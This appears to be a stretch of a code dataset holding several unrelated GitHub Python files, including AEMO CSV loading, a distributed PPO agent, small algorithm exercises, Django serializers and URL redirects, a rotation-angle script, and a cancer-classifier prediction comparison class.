reader\n\n\n# In[37]:\n\n\n# assign dataset names - Monir\nPUBLIC_TRADINGIS_list_of_files = []\n\n#read all dataset names with starting PUBLIC_DISPATCHSCADA - Monir\nPUBLIC_TRADINGIS_list_of_files = glob.glob('PUBLIC_TRADINGIS*.csv')\n\n\n# In[38]:\n\n\nlen(PUBLIC_TRADINGIS_list_of_files)\n\n\n# In[39]:\n\n\n# create empty list\ndataframes_list = []\n\nlist_of_names = PUBLIC_TRADINGIS_list_of_files\n\n\n# In[40]:\n\n\n# append datasets into teh list\nfor i in range(len(list_of_names)):\n # read csv file as a list of lists\n with open(list_of_names[i], 'r') as read_obj:\n # pass the file object to reader() to get the reader object\n csv_reader = reader(read_obj)\n # Pass reader object to list() to get a list of lists\n list_of_rows = list(csv_reader)\n #print(list_of_rows)\n #temp_df = pd.DataFrame(list_of_rows)\n temp_df = pd.DataFrame(list_of_rows[9:14])\n dataframes_list.append(temp_df)\n list_of_column = list_of_rows[8]\n \n \n #temp_df = pd.read_csv(list_of_names[i], skiprows = 1, skipfooter = 1)\n #dataframes_list[i]=temp_df\n #dataframes_list.append(temp_df)\n \n\n\n# In[42]:\n\n\nlen(dataframes_list)\n\n\n# In[41]:\n\n\nlist_of_column\n\n\n# In[43]:\n\n\ndataframes_list[0].shape\n\n\n# In[44]:\n\n\ndataframes_list[1673].tail()\n\n\n# In[45]:\n\n\n# multiple DataFrames are be merged (Concatenate pandas objects) - Monir\nPUBLIC_TRADINGIS_df = pd.concat(dataframes_list)\n\n\n# In[46]:\n\n\nPUBLIC_TRADINGIS_df.shape\n\n\n# In[47]:\n\n\nPUBLIC_TRADINGIS_df\n\n\n# In[48]:\n\n\nPUBLIC_TRADINGIS_df.columns = list_of_column\n\n\n# In[49]:\n\n\nPUBLIC_TRADINGIS_df.head()\n\n\n# In[21]:\n\n\nwith open('PUBLIC_TRADINGIS_202104180030_0000000340056853.csv', 'r') as read_obj:\n # pass the file object to reader() to get the reader object\n csv_reader = reader(read_obj)\n # Pass reader object to list() to get a list of lists\n list_of_rows = list(csv_reader)\n #print(list_of_rows)\n #temp_df = pd.DataFrame(list_of_rows)\n test_df = pd.DataFrame(list_of_rows[8:14])\n #temp_df = pd.DataFrame(list_of_rows[8:14])\n \n\n\n# In[22]:\n\n\ntest_df.head()\n\n\n# In[30]:\n\n\nPUBLIC_TRADINGIS_df.dtypes\n\n\n# In[31]:\n\n\nPUBLIC_TRADINGIS_df.info()\n\n\n# In[50]:\n\n\nPUBLIC_TRADINGIS_df\n\n\n# In[51]:\n\n\n# Export Pandas DataFrame to CSV - Monir\nPUBLIC_TRADINGIS_df.to_csv('PUBLIC_TRADINGIS_df.csv', index=False)\n\n\n# In[ ]:\n\n\n\n\n","repo_name":"mzkhan2000/AEMO-data-Analytics","sub_path":"code-for-fetching-data/PUBLIC_TRADINGIS_DATA-monir.py","file_name":"PUBLIC_TRADINGIS_DATA-monir.py","file_ext":"py","file_size_in_byte":2490,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"70352062803","text":"import numpy as np\nimport torch\nfrom torch.autograd import Variable\nimport models\nimport pyro\nimport pyro.distributions as dist\nimport gym\nimport mujoco_py\n\n# start to define the workers...\nclass dppo_workers:\n def __init__(self, args):\n self.args = args \n self.env = gym.make(self.args.env_name)\n\n # get the numbers of observation and actions...\n num_inputs = self.env.observation_space.shape[0]\n num_actions = self.env.action_space.shape[0]\n # define the network...\n self.actor_net = models.Actor_Network(num_inputs, num_actions)\n self.critic_net = models.Critic_Network(num_inputs)\n \n # start to define the training function...\n def train_network(self, traffic_signal, critic_counter, actor_counter, shared_critic_model, shared_actor_model, \\\n shared_obs_state, critic_shared_grad_buffer, actor_shared_grad_buffer, reward_buffer):\n\n # update the parameters....\n self.actor_net.load_state_dict(shared_actor_model.state_dict())\n self.critic_net.load_state_dict(shared_critic_model.state_dict())\n while True:\n # update the parameters...\n # define the memory...\n brain_memory = []\n reward_sum = 0\n for _ in range(self.args.collection_length):\n state = self.env.reset()\n state = shared_obs_state.normalize(state)\n while True:\n # put the state into the Variables....\n state_tensor = Variable(torch.Tensor(state).unsqueeze(0))\n # input the state into the network to predict the actions...\n action_alpha, action_beta = self.actor_net(state_tensor)\n # sample actions from the beta distribution....\n actions_cpu, actions_real = self.select_actions(action_alpha, action_beta)\n # input actions into the environment...\n state_, reward, done, _ = self.env.step(actions_real)\n # accumulate the rewards...\n reward_sum += reward\n # start to store the trainsition...\n brain_memory.append((state, reward, done, actions_cpu))\n if done:\n break \n \n # normalize the state...\n state_ = shared_obs_state.normalize(state_)\n state = state_\n # start to calculate the gradients for this time sequence...\n reward_buffer.add(reward_sum / self.args.collection_length)\n critic_loss, actor_loss = self.update_network(brain_memory, critic_shared_grad_buffer, actor_shared_grad_buffer, \\\n shared_critic_model, shared_actor_model, critic_counter, actor_counter, traffic_signal)\n\n\n # calculate the gradients based on the information be collected...\n def update_network(self, brain_memory, critic_shared_grad_buffer, actor_shared_grad_buffer, \\\n shared_critic_model, shared_actor_model, critic_counter, actor_counter, traffic_signal):\n # process the stored information\n state_batch = torch.Tensor(np.array([element[0] for element in brain_memory]))\n reward_batch = torch.Tensor(np.array([element[1] for element in brain_memory]))\n done_batch = [element[2] for element in brain_memory]\n actions_batch = torch.Tensor(np.array([element[3] for element in brain_memory]))\n\n # put them into the Variables...\n state_batch_tensor = Variable(state_batch)\n actions_batch_tensor = Variable(actions_batch)\n # calculate the discounted reward...\n returns, advantages, old_action_prob = self.calculate_discounted_reward(state_batch_tensor, \\\n done_batch, reward_batch, actions_batch_tensor)\n\n # calculate the gradients...\n critic_loss, actor_loss = self.calculate_the_gradients(state_batch_tensor, actions_batch_tensor, \\\n returns, advantages, old_action_prob, critic_shared_grad_buffer, actor_shared_grad_buffer, \\\n shared_critic_model, shared_actor_model, critic_counter, actor_counter, traffic_signal)\n \n return critic_loss.data.cpu().numpy()[0], actor_loss.data.cpu().numpy()[0]\n\n # calculate the gradients...\n def calculate_the_gradients(self, state_batch_tensor, actions_batch, returns, advantages, old_action_prob, critic_shared_grad_buffer, \\\n actor_shared_grad_buffer, shared_critic_model, shared_actor_model, critic_counter, actor_counter, traffic_signal):\n\n # put the tensors into the Variable...\n returns = Variable(returns)\n advantages = Variable(advantages)\n # start to calculate the gradient of critic network firstly....\n for _ in range(self.args.value_update_step):\n self.critic_net.zero_grad()\n # get the init signal...\n signal_init = traffic_signal.get()\n # start to process...\n predicted_value = self.critic_net(state_batch_tensor)\n # calculate the critic loss firstly...\n critic_loss = (returns - predicted_value).pow(2).mean()\n # do the back-propagation...\n critic_loss.backward()\n # add the gradient to the shared_buffer...\n critic_shared_grad_buffer.add_gradient(self.critic_net)\n # after add the gradient, add the counter...\n critic_counter.increment()\n # wait for the cheif's signal...\n while signal_init == traffic_signal.get():\n pass\n self.critic_net.load_state_dict(shared_critic_model.state_dict())\n \n # start to update the critic_network....\n for _ in range(self.args.policy_update_step):\n # get the init signal....\n self.actor_net.zero_grad()\n signal_init = traffic_signal.get()\n # start to process...\n action_alpha, action_beta = self.actor_net(state_batch_tensor)\n new_beta_dist = dist.Beta(action_alpha, action_beta)\n new_action_prob = new_beta_dist.batch_log_pdf(actions_batch)\n ratio = torch.exp(new_action_prob - old_action_prob)\n surr1 = ratio * advantages\n surr2 = torch.clamp(ratio, 1 - self.args.epsilon, 1 + self.args.epsilon) * advantages\n actor_loss = -torch.min(surr1, surr2).mean()\n # do the back propogation\n actor_loss.backward()\n actor_shared_grad_buffer.add_gradient(self.actor_net)\n actor_counter.increment()\n while signal_init == traffic_signal.get():\n pass\n self.actor_net.load_state_dict(shared_actor_model.state_dict())\n \n return critic_loss, actor_loss\n\n # calculate the discounted reward\n def calculate_discounted_reward(self, state_batch_tensor, done_batch, reward_batch, actions_batch_tensor):\n # calculate the predicted value firstly...\n predicted_value = self.critic_net(state_batch_tensor)\n # calculate the returns and advantages firstly...\n predicted_value = predicted_value.detach()\n\n returns = torch.Tensor(len(done_batch), 1)\n advantages = torch.Tensor(len(done_batch), 1)\n deltas = torch.Tensor(len(done_batch), 1)\n\n previous_returns = 0\n previous_advantages = 0\n previous_value = 0\n # use gae here...\n for idx in reversed(range(len(done_batch))):\n if done_batch[idx]:\n returns[idx, 0] = reward_batch[idx]\n #deltas[idx, 0] = reward_batch[idx] - predicted_value.data[idx, 0]\n #advantages[idx, 0] = deltas[idx, 0]\n advantages[idx, 0] = returns[idx, 0] - predicted_value.data[idx, 0]\n else:\n returns[idx, 0] = reward_batch[idx] + self.args.gamma * previous_returns\n #deltas[idx, 0] = reward_batch[idx] + self.args.gamma * previous_value - predicted_value.data[idx, 0]\n #advantages[idx, 0] = deltas[idx, 0] + self.args.gamma * self.args.tau * previous_advantages\n advantages[idx, 0] = returns[idx, 0] - predicted_value.data[idx, 0]\n\n previous_returns = returns[idx, 0]\n previous_value = predicted_value.data[idx, 0]\n previous_advantages = advantages[idx, 0]\n\n # normalize the advantages...\n advantages = (advantages - advantages.mean()) / advantages.std()\n # calculate the old action probabilities...\n action_alpha, action_beta = self.actor_net(state_batch_tensor)\n old_beta_dist = dist.Beta(action_alpha, action_beta)\n old_action_prob = old_beta_dist.batch_log_pdf(actions_batch_tensor)\n old_action_prob = old_action_prob.detach()\n \n return returns, advantages, old_action_prob \n\n # sample actions from the beta distributions....\n def select_actions(self, alpha, beta):\n actions = dist.beta(alpha, beta)\n actions_cpu = actions.data.cpu().numpy()[0]\n # real action...\n actions_real = actions_cpu.copy()\n actions_real = -1 + actions_real * 2\n\n return actions_cpu, actions_real\n\n# ------------------------------------------------------------------------------------------#\n# HERE, WE STRAT TO TEST OUR ALGORITHMS...\n def test_network(self, model_path):\n # load the models and means and std...\n policy_model, running_mean_filter = torch.load(model_path, map_location=lambda storage, loc: storage)\n mean = running_mean_filter[0]\n std = running_mean_filter[1]\n\n self.actor_net.load_state_dict(policy_model)\n self.actor_net.eval()\n\n # start to test...\n while True:\n state = self.env.reset()\n state = self.normalize_filter(state, mean, std)\n reward_sum = 0\n while True:\n self.env.render()\n state_tensor = Variable(torch.Tensor(state).unsqueeze(0))\n # input the state into the network...\n action_alpha, action_beta = self.actor_net(state_tensor)\n # build up the beta distribution...\n action = dist.Beta(action_alpha, action_beta).analytic_mean()\n action_real = action.data.cpu().numpy()[0]\n action_real = -1 + 2 * action_real\n # input the action into the environment...\n state_, reward, done, _ = self.env.step(action_real)\n # sum the reward...\n reward_sum += reward\n if done:\n break \n state_ = self.normalize_filter(state_, mean, std)\n state = state_\n\n print('the reward sum in this episode is ' + str(reward_sum) + '!')\n\n\n # this is used in the testing...\n def normalize_filter(self, x, mean, std):\n x = (x - mean) / (std + 1e-8)\n x = np.clip(x, -5.0, 5.0)\n\n return x\n\n","repo_name":"TianhongDai/distributed-ppo","sub_path":"dppo_agent.py","file_name":"dppo_agent.py","file_ext":"py","file_size_in_byte":11131,"program_lang":"python","lang":"en","doc_type":"code","stars":54,"dataset":"github-code","pt":"3"} +{"seq_id":"20604690481","text":"# Given an array of strings, group anagrams together.\n#\n# Example:\n#\n# Input: [\"eat\", \"tea\", \"tan\", \"ate\", \"nat\", \"bat\"],\n# Output:\n# [\n# [\"ate\",\"eat\",\"tea\"],\n# [\"nat\",\"tan\"],\n# [\"bat\"]\n# ]\n# Note:\n#\n# All inputs will be in lowercase.\n# The order of your output does not matter.\n\ndef group_anagrams(strs):\n listOfWords = []\n listOfAnagrams = []\n for i in range(len(strs)):\n word = sorted(strs[i])\n word = ''.join(word)\n\n if word in listOfWords:\n indexOfWords = listOfWords.index(word)\n listOfAnagrams[indexOfWords].append(strs[i])\n else:\n listOfWords.append(word)\n listOfAnagrams.append([strs[i]])\n\n return listOfAnagrams\n\nprint(group_anagrams(strs = [\"eat\", \"tea\", \"tan\", \"ate\", \"nat\", \"bat\"]))\n","repo_name":"DarishSakeesing/Coding_Challenges","sub_path":"Group_Anagrams.py","file_name":"Group_Anagrams.py","file_ext":"py","file_size_in_byte":786,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"25879651452","text":"while(True):\n try:\n lista = []\n linea = input()\n a, b, c, d = linea.split()\n a, b, c, d = int(a), int(b), int(c), int(d)\n lista.append(a)\n lista.append(b)\n lista.append(c)\n lista.append(d)\n lista.sort()\n if(lista[0]+lista[3] >= lista[1]+lista[2]):\n print((lista[0]+lista[3]) - (lista[1]+lista[2]))\n else:\n print((lista[1]+lista[2]) - (lista[0]+lista[3]))\n except EOFError:\n break\n","repo_name":"roca12/gpccodes","sub_path":"Resueltos/Bryann Valderrama/Python/7886_AssigningTeams.py","file_name":"7886_AssigningTeams.py","file_ext":"py","file_size_in_byte":492,"program_lang":"python","lang":"pt","doc_type":"code","stars":2,"dataset":"github-code","pt":"3"} +{"seq_id":"74439363922","text":"from rest_framework import serializers\n\nfrom applications.cmdb.models import Relation, CISchema, SchemaThroughRelation\n\n\nclass RelationSerializer(serializers.ModelSerializer):\n class Meta:\n model = Relation\n fields = \"__all__\"\n\n\nclass TopoSchemaSerializer(serializers.ModelSerializer):\n id = serializers.CharField()\n label = serializers.CharField(source=\"alias\")\n text = serializers.SerializerMethodField()\n\n def get_text(self, obj):\n return obj.icon_url.replace(\"cmdb-\", \"\")\n\n class Meta:\n model = CISchema\n fields = (\"id\", \"label\", \"text\")\n\n\nclass TopoRelationSerializer(serializers.ModelSerializer):\n source = serializers.CharField(source=\"parent_id\")\n target = serializers.CharField(source=\"child_id\")\n label = serializers.CharField(source=\"relation.alias\")\n\n class Meta:\n model = SchemaThroughRelation\n fields = (\"source\", \"target\", \"label\")\n","repo_name":"xhongc/dj-cmdb","sub_path":"applications/relation/serializers.py","file_name":"serializers.py","file_ext":"py","file_size_in_byte":926,"program_lang":"python","lang":"en","doc_type":"code","stars":8,"dataset":"github-code","pt":"3"} +{"seq_id":"7593833076","text":"import numpy as np\r\nfrom numpy.linalg import inv, eig, det\r\nimport math\r\n\r\n#def sin(angle):\r\n# return math.sin(angle)\r\n\t\r\n#def cos(angle):\r\n# return math.cos(angle)\r\n\t\r\n#def tan(angle):\r\n# return math.tan(angle)\r\n\r\ndef AngleCase(i, Angle):\r\n if i == 0:\r\n return Angle\r\n elif i == 1:\r\n return math.pi - Angle\r\n #elif i == 2:\r\n # return Angle\r\n #elif i == 3:\r\n # return Angle - math.pi\r\n\r\ndef AngleCase2(i, Angle):\r\n if i == 0:\r\n return Angle\r\n elif i == 1:\r\n return Angle + math.pi\r\n\r\ndef AngleCorr(Angle):\r\n if Angle > math.pi :\r\n return Angle - 2 * math.pi\r\n elif Angle < -math.pi:\r\n return Angle + 2 * math.pi\r\n else:\r\n return Angle\r\n\r\ndef RotationMatrix(omega, phi, kappa):\r\n MOmega = np.array([[1, 0, 0],[0, math.cos(omega), math.sin(omega)],[0, -math.sin(omega), math.cos(omega)]])\r\n MPhi = np.array([[math.cos(phi), 0, -math.sin(phi)],[0, 1, 0 ],[math.sin(phi), 0, math.cos(phi)]])\r\n MKappa = np.array([[math.cos(kappa), math.sin(kappa), 0],[-math.sin(kappa), math.cos(kappa), 0 ],[0, 0, 1]])\r\n return MKappa.dot(MPhi.dot(MOmega))\r\n\r\nRA = np.array([[-0.068675, -0.0640878, -0.764565],[0.012267, 0.765774, -0.642993],[0.997564, -0.053536, -0.044728]])\r\n\r\nPhi = math.asin(RA[2, 0])\r\nOmega = math.asin(-RA[2, 1] / math.cos(Phi))\r\nKappa = math.asin(-RA[1, 0] / math.cos(Phi))\r\n\r\nKappa2 = math.atan(RA[1, 0] / RA[0, 0])\r\nOmega2 = math.atan(-RA[2, 1] / RA[2, 2])\r\nPhi2 = math.atan(RA[2, 0] * math.cos(Kappa2) / RA[0, 0])\r\n\r\n#Kappa = math.atan(-RA[1,0]/RA[0,0])\r\n#Phi = math.acos(RA[0,0]/math.cos(Kappa))\r\n#Omega = math.acos(RA[2,2]*math.cos(Kappa)/RA[0,0])\r\n\r\nprint(\"Omega = \" + str(Omega*180/math.pi) + \"////\" + \"129.52.40\")\r\nprint(\"Phi = \" + str(Phi*180/math.pi) + \"////\" + \"85.59.59\")\r\nprint(\"Kappa = \" + str(Kappa*180/math.pi) + \"////\" + \"190.07.39\")\r\n\r\nprint(\" \")\r\nprint(\"Omega = \" + str(Omega2*180/math.pi) + \"////\" + \"129.52.40\")\r\nprint(\"Phi = \" + str(Phi2*180/math.pi) + \"////\" + \"85.59.59\")\r\nprint(\"Kappa = \" + str(Kappa2*180/math.pi) + \"////\" + \"190.07.39\")\r\n\r\nAccurateAngle = [0, 0, 0, 0, 0, 0]\r\nAccurateAngle2 = [0, 0, 0, 0, 0, 0]\r\n\r\nmin = 99999999\r\n\r\nfor i in range(2):\r\n om = AngleCase(i, Omega)\r\n for j in range(2):\r\n ph = AngleCase(j, Phi)\r\n for k in range(2):\r\n ka = AngleCase(k, Kappa)\r\n R = RotationMatrix(om, ph, ka)\r\n if abs(det(R.T.dot(RA))) < min:\r\n min = abs(det(R.T.dot(RA)))\r\n AccurateAngle[0] = AngleCorr(om)*180/math.pi\r\n AccurateAngle[1] = AngleCorr(ph)*180/math.pi\r\n AccurateAngle[2] = AngleCorr(ka)*180/math.pi\r\n AccurateAngle[3] = i\r\n AccurateAngle[4] = j\r\n AccurateAngle[5] = k\r\n\r\nfor i in range(2):\r\n om = AngleCase2(i, Omega2)\r\n for j in range(2):\r\n ph = AngleCase2(j, Phi2)\r\n for k in range(2):\r\n ka = AngleCase2(k, Kappa2)\r\n R = RotationMatrix(om, ph, ka)\r\n if abs(det(R.T.dot(RA))) < min:\r\n min = abs(det(R.T.dot(RA)))\r\n AccurateAngle2[0] = AngleCorr(om)*180/math.pi\r\n AccurateAngle2[1] = AngleCorr(ph)*180/math.pi\r\n AccurateAngle2[2] = AngleCorr(ka)*180/math.pi\r\n AccurateAngle2[3] = i\r\n AccurateAngle2[4] = j\r\n AccurateAngle2[5] = k\r\n\t\t\t\t\r\nprint(\" \")\r\nprint(AccurateAngle)\r\nprint(AccurateAngle2)\r\nprint(\"[129.52.40 85.59.59 190.07.39]\")\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n \r\n\t\t\t\r\n","repo_name":"WeiCheng302/Assignments","sub_path":"Else/angle.py","file_name":"angle.py","file_ext":"py","file_size_in_byte":3566,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"14478306949","text":"'''\nTitle : Dictionaries and Maps\nSubdomain : 30 Days of Code\nDomain : Python 3\nAuthor : Manuel Zabala\nCreated : 2/19/2019\nProblem : https://www.hackerrank.com/challenges/30-dictionaries-and-maps/problem\n'''\n\n# Number of test cases\ntestnum = int(input())\nphonebook = {}\n\n# iterating to populate dict with given input\nfor _ in range(testnum):\n name, number = input().split()\n phonebook[name] = number\n\nfor _ in range(testnum):\n name = input()\n\n if name in phonebook:\n print('{}={}'.format(name, phonebook[name]))\n else:\n print('Not found')\n","repo_name":"Mzaba014/Hackerrank-Solutions","sub_path":"30 Days of Code/day8_dictionaries_and_maps.py","file_name":"day8_dictionaries_and_maps.py","file_ext":"py","file_size_in_byte":582,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"3"} +{"seq_id":"72311156243","text":"\"\"\"\n\"abacabad\" c\n\"abacabaabacaba\" _\n\"\"\"\ndef first_not_repeating_char(char_secuence):\n\tseen_letters = {}\n\n\tfor i, letter in enumerate(char_secuence):\n\t\tif letter not in seen_letters:\n\t\t\tseen_letters[letter] = (i, 1)\n\t\telse:\n\t\t\tseen_letters[letter] = (seen_letters[letter][0], seen_letters[letter][1] + 1)\n\n\tprint(seen_letters)\n\n\tfinal_letters = []\n\n\tfor key, value in seen_letters.items():\n\t\tif value[1] == 1:\n\t\t\tfinal_letters.append( (key, value[0]) )\n\n\t\t\t#La función lambda hace lo mismo que sort_order()\n\t\t\t# def sort_order(value):\n\t\t\t# \treturn value[1]\n\n\tnot_repeated_letters = sorted(final_letters, key=lambda value: value[1])\n\n\tif not_repeated_letters:\n\t\treturn not_repeated_letters[0][0]\n\telse:\n\t\treturn '_'\n\n\nif __name__ == '__main__':\n\tchar_secuence = str(input('Escribe una secuencia de caracteres: '))\n\n\tresult = first_not_repeating_char(char_secuence)\n\n\tif result == '_':\n\t\tprint('Todos los caracteres se repiten')\n\telse:\n\t\tprint('El primer caracater que no se repite es: {}'.format(result))","repo_name":"jbeltranleon/python-basics","sub_path":"first_not_repeating_char.py","file_name":"first_not_repeating_char.py","file_ext":"py","file_size_in_byte":1003,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"3"} +{"seq_id":"38301909968","text":"import numpy as np\nimport pandas as pd\nfrom typing import Literal\nfrom pprint import pformat\nfrom functools import cached_property\nfrom cuppa.classifier.cuppa_prediction import CuppaPredSummary\nfrom cuppa.logger import LoggerMixin\nfrom cuppa.misc.utils import as_categorical\n\n\nclass CuppaCompare(LoggerMixin):\n\n \"\"\"\n Compares two CuppaPredSummary objects\n\n This class can be instantiated directly given two CuppaPredSummary objects. One is referred to as 'old' and the\n other as 'new'. Alternatively, prediction summaries stored as tsv files can also be loaded using the\n from_pred_summ_files() method.\n\n The following properties contain the comparison stats:\n\n prediction_comparison: Comparison of the top-1 prediction probabilities and classes for each sample.\n The 'correct_type' column shows whether the prediction in old only, new only, both or neither.\n\n correct_type_stats: Counts of each 'correct_type' per classifier\n\n performance_comparison: Comparison of recall and precision per class. This table also shows a comparison per\n class of the number of samples in total, predicted as that class, and correctly predicted.\n \"\"\"\n\n def __init__(\n self,\n pred_summ_old: CuppaPredSummary,\n pred_summ_new: CuppaPredSummary,\n ):\n self.pred_summ_old = pred_summ_old\n self.pred_summ_new = pred_summ_new\n\n self._check_actual_class_column_exists()\n\n\n def __repr__(self) -> str:\n return pformat(vars(self))\n\n def _check_actual_class_column_exists(self):\n error_msg = \"`actual_class` column is required but absent from `%s`\"\n\n if not self.pred_summ_old._has_actual_class_column:\n self.logger.error(error_msg % \"pred_summ_old\")\n raise KeyError\n\n if not self.pred_summ_new._has_actual_class_column:\n self.logger.error(error_msg % \"pred_summ_new\")\n raise KeyError\n\n @staticmethod\n def from_pred_summ_files(path_old: str, path_new: str):\n return CuppaCompare(\n pred_summ_old = CuppaPredSummary.from_tsv(path_old),\n pred_summ_new = CuppaPredSummary.from_tsv(path_new)\n )\n\n @staticmethod\n def _align_rows(\n df1: pd.DataFrame,\n df2: pd.DataFrame,\n index_columns: str | list[str] | pd.Series,\n index_location: Literal[\"both\", \"columns\", \"index\"] = \"both\",\n copy: bool = True\n ) -> tuple[pd.DataFrame, pd.DataFrame]:\n\n if copy:\n df1 = df1.copy()\n df2 = df2.copy()\n\n ## Get all rows, given `index_columns`\n index_union = pd.concat([\n df1[index_columns],\n df2[index_columns],\n ])\n\n ## Make indexes\n if len(pd.Series(index_columns))==1:\n index_union = index_union.unique()\n\n df1.index = df1[index_columns]\n df2.index = df2[index_columns]\n else:\n index_union = index_union.drop_duplicates()\n index_union = pd.MultiIndex.from_frame(index_union)\n\n df1.index = pd.MultiIndex.from_frame(df1[index_columns])\n df2.index = pd.MultiIndex.from_frame(df2[index_columns])\n\n ## Align indexes\n df1 = df1.reindex(index_union)\n df2 = df2.reindex(index_union)\n\n if index_location == \"columns\":\n df1.reset_index(inplace=True, drop=True)\n df2.reset_index(inplace=True, drop=True)\n\n if index_location == \"index\":\n df1.drop(index_columns, inplace=True, axis=1)\n df2.drop(index_columns, inplace=True, axis=1)\n\n return df1, df2\n\n @staticmethod\n def _move_index_to_columns(df: pd.DataFrame):\n df.index.names = pd.MultiIndex.from_arrays([\n [\"info\"] * len(df.index.names),\n df.index.names\n ])\n df = df.reset_index()\n return df\n\n @cached_property\n def prediction_comparison(self) -> pd.DataFrame:\n\n new = self.pred_summ_new.copy()\n old = self.pred_summ_old.copy()\n\n required_columns = [\"sample_id\", \"clf_name\", \"actual_class\", \"pred_class_1\", \"pred_prob_1\", \"is_correct_pred\"]\n new = new[required_columns]\n old = old[required_columns]\n\n new, old = self._align_rows(\n df1 = new,\n df2 = old,\n index_columns = [\"sample_id\", \"clf_name\"],\n index_location = \"index\",\n copy = False\n )\n\n def get_correct_type():\n _new = new[\"is_correct_pred\"]\n _old = old[\"is_correct_pred\"]\n\n correct_type = np.full(len(new), np.nan, dtype=object)\n\n correct_type[(_new == True) & (_old == True) ] = \"both\"\n correct_type[(_new == True) & (_old == False)] = \"new_only\"\n correct_type[(_new == False) & (_old == True) ] = \"old_only\"\n correct_type[(_new == False) & (_old == False)] = \"neither\"\n\n return pd.Series(correct_type, index=new.index)\n\n def column_equal(column: str) -> pd.Series:\n output = new[column] == old[column]\n output[new[column].isna() | old[column].isna()] = np.nan\n return output\n\n info = pd.DataFrame(dict(\n correct_type=get_correct_type()\n ))\n\n is_equal = pd.DataFrame(dict(\n actual_class = column_equal(\"actual_class\"),\n pred_class_1 = column_equal(\"pred_class_1\"),\n pred_prob_1 = column_equal(\"pred_prob_1\"),\n ))\n\n comparison = pd.concat(\n dict(info=info, is_equal=is_equal, new=new, old=old),\n axis=1\n )\n\n comparison = self._move_index_to_columns(comparison)\n\n ## Force classifier order\n clf_names = comparison[(\"info\",\"clf_name\")]\n clf_names = as_categorical(clf_names)\n comparison[(\"info\", \"clf_name\")] = clf_names\n\n return comparison\n\n @cached_property\n def correct_type_stats(self) -> pd.DataFrame:\n comparison = self.prediction_comparison\n\n stats = comparison[\"info\"]\\\n .groupby(\"clf_name\")\\\n [\"correct_type\"]\\\n .value_counts(dropna=False)\\\n .reset_index()\n\n return stats\n\n @cached_property\n def performance_comparison(self) -> pd.DataFrame:\n new = self.pred_summ_new.performance()\n old = self.pred_summ_old.performance()\n\n new, old = self._align_rows(\n df1=new,\n df2=old,\n index_columns=[\"class\", \"clf_name\"],\n index_location=\"index\",\n copy=False\n )\n\n diff = new - old\n\n comparison = pd.concat(\n dict(diff=diff, new=new, old=old),\n axis=1\n )\n\n comparison = self._move_index_to_columns(comparison)\n\n return comparison\n\n\n\n","repo_name":"hartwigmedical/hmftools","sub_path":"cuppa/src/main/python/pycuppa/cuppa/classifier/cuppa_compare.py","file_name":"cuppa_compare.py","file_ext":"py","file_size_in_byte":6771,"program_lang":"python","lang":"en","doc_type":"code","stars":157,"dataset":"github-code","pt":"3"} +{"seq_id":"17481248095","text":"from django.conf.urls import patterns, url\nfrom django.views.generic import RedirectView\n\nfrom . import views\n\n\nAPP_SLUGS = {\n 'chrono': 'Chrono',\n 'face_value': 'Face_Value',\n 'podcasts': 'Podcasts',\n 'roller': 'Roller',\n 'webfighter': 'Webfighter',\n 'generalnotes': 'General_Notes',\n 'rtcamera': 'rtcamera'\n}\n\n\ndef redirect_doc(uri, request=None):\n view = RedirectView.as_view(\n url='https://developer.mozilla.org/docs%s' % uri)\n return view(request) if request else view\n\n\nredirect_patterns = patterns(\n '',\n url('^docs/firefox_os_guideline$',\n redirect_doc('/Web/Apps/Design'),\n name='ecosystem.ffos_guideline'),\n url('^docs/responsive_design$',\n redirect_doc('/Web_Development/Mobile/Responsive_design'),\n name='ecosystem.responsive_design'),\n url('^docs/patterns$',\n redirect_doc('/Web/Apps/Design/Responsive_Navigation_Patterns'),\n name='ecosystem.design_patterns'),\n url('^docs/review$',\n redirect_doc('/Web/Apps/Publishing/Marketplace_review_criteria'),\n name='ecosystem.publish_review'),\n url('^docs/deploy$',\n redirect_doc('/Mozilla/Marketplace/Options/Introduction'),\n name='ecosystem.publish_deploy'),\n url('^docs/hosted$',\n redirect_doc('/Mozilla/Marketplace/Options/Self_publishing'\n '#Self-publishing_Hosted_Apps'),\n name='ecosystem.publish_hosted'),\n url('^docs/submission$',\n redirect_doc('/Mozilla/Marketplace/Publishing/Submit/Overview'),\n name='ecosystem.publish_submit'),\n url('^docs/packaged$',\n redirect_doc('/Mozilla/Marketplace/Options/Packaged_apps'),\n name='ecosystem.publish_packaged'),\n url('^docs/intro_apps$',\n redirect_doc('/Web/Apps/Quickstart/Build/Intro_to_open_web_apps'),\n name='ecosystem.build_intro'),\n url('^docs/firefox_os$',\n redirect_doc('/Mozilla/Firefox_OS'),\n name='ecosystem.build_ffos'),\n url('^docs/manifests$',\n redirect_doc('/Web/Apps/FAQs/About_app_manifests'),\n name='ecosystem.build_manifests'),\n url('^docs/apps_offline$',\n redirect_doc('/Web/Apps/Offline_apps'),\n name='ecosystem.build_apps_offline'),\n url('^docs/game_apps$',\n redirect_doc('/Web/Apps/Developing/Games'),\n name='ecosystem.build_game_apps'),\n url('^docs/mobile_developers$',\n redirect_doc('/Web/Apps/Quickstart/Build/For_mobile_developers'),\n name='ecosystem.build_mobile_developers'),\n url('^docs/web_developers$',\n redirect_doc('/Web/Apps/Quickstart/Build/For_Web_developers'),\n name='ecosystem.build_web_developers'),\n url('^docs/firefox_os_simulator$',\n redirect_doc('/Tools/Firefox_OS_Simulator'),\n name='ecosystem.firefox_os_simulator'),\n url('^docs/payments$',\n redirect_doc('/Mozilla/Marketplace/Monetization'\n '/Introduction_Monetization'),\n name='ecosystem.build_payments'),\n url('^docs/concept$',\n redirect_doc('/Web/Apps/Quickstart/Design/Concept_A_great_app'),\n name='ecosystem.design_concept'),\n url('^docs/fundamentals$',\n redirect_doc('/Web/Apps/Design/Design_Principles'),\n name='ecosystem.design_fundamentals'),\n url('^docs/ui_guidelines$',\n redirect_doc('/Web/Apps/Design'),\n name='ecosystem.design_ui'),\n url('^docs/quick_start$',\n redirect_doc('/Web/Apps/Quickstart'),\n name='ecosystem.build_quick'),\n 